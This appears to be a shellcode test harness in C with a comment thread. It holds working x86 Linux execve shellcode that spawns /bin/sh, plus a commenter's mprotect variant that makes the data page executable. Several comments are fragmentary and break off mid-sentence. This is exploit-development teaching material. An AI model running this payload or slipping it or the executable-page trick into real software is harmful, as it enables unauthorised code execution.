#include <stdio.h>
#include <string.h>

/* x86 Linux shellcode under test */
unsigned char code[] = \
"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";

int main(void)
{
    printf("Shellcode Length: %zu\n", strlen((char *)code));
    /* Cast the byte array to a function pointer and call it. */
    int (*ret)() = (int(*)())code;
    ret();
    return 0;
}
Well of course, you're running Linux shellcode in a Windows environment... The \xcd\x80 should have given this away...
for the future noobs: this is an x86 linux shellcode that will spawn a
if you face the "sys/cdefs.h: No such file or directory" fatal error; I hope this helped!
S/O to AddaxSoft for the great insight, such a homie!
Illegal instruction?
This doesn't help (anymore?). First: the code is not on the stack - it's in the .data segment. Thus, for the future and past noobs: at least on my x64 the memory page is not executable (x86 only has r/w, x64 has r/w/x, that's why it always works on x86 and the problem does not occur there).

#include <sys/mman.h>   /* mprotect, PROT_*; goes with the other includes */

int main(){
    printf("Shellcode length: %zu\n", strlen((char *)code));
    /* Make the 4K page holding code[] executable; the (int) cast assumes a 32-bit build. */
    int r = mprotect((void *)((int)code & ~4095), 4096, PROT_READ | PROT_WRITE|PROT_EXEC);
    printf("mprotect: %d\n",r);
    int (*ret)() = (int(*)())code;
    return ret();
}
Why
It's the page alignment (so to speak, "drop the last three nibbles of the address"; since the page is 4K, this will result in the beginning of the page where the code[] is stored). Now you can indeed compile:
gcc -m32 shellcodetest.c
./a.out
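An added example, not part of the gist or of any commenter's code: the page alignment explained in the comment above, generalized so the range also covers a buffer that straddles a page boundary, plus a lookup in /proc/self/maps that shows the permissions of the mapping holding a data buffer (no `x` is why the jump faults). `page_span`, `page_perms` and `sample` are hypothetical names, and Linux with /proc is assumed.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Page-aligned range covering [addr, addr+len); page must be a power of two.
 * Unlike a fixed "& ~4095, 4096", this also covers a buffer that crosses
 * into the next page. */
static void page_span(uintptr_t addr, size_t len, uintptr_t page,
                      uintptr_t *start, size_t *span)
{
    uintptr_t end = (addr + len + page - 1) & ~(page - 1); /* round up */
    *start = addr & ~(page - 1);                           /* round down */
    *span = (size_t)(end - *start);
}

/* Copy the permission field (e.g. "rw-p") of the mapping containing p
 * into out[5]. Returns 0 on success, -1 if not found or /proc is missing. */
static int page_perms(const void *p, char out[5])
{
    FILE *f = fopen("/proc/self/maps", "r");
    char line[512], perms[5];
    unsigned long lo, hi;
    int rc = -1;
    if (!f) return -1;
    while (fgets(line, sizeof line, f)) {
        if (sscanf(line, "%lx-%lx %4s", &lo, &hi, perms) == 3 &&
            (uintptr_t)p >= lo && (uintptr_t)p < hi) {
            memcpy(out, perms, 5);
            rc = 0;
            break;
        }
    }
    fclose(f);
    return rc;
}

static unsigned char sample[25]; /* constructed stand-in buffer, holds no code */

int main(void)
{
    uintptr_t start; size_t span; char perms[5];
    page_span((uintptr_t)sample, sizeof sample,
              (uintptr_t)sysconf(_SC_PAGESIZE), &start, &span);
    printf("buffer %p -> page %p, %zu bytes\n", (void *)sample, (void *)start, span);
    if (page_perms(sample, perms) == 0)
        printf("mapping permissions: %s\n", perms); /* third char is 'x' only if executable */
    return 0;
}
```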
Segmentation fault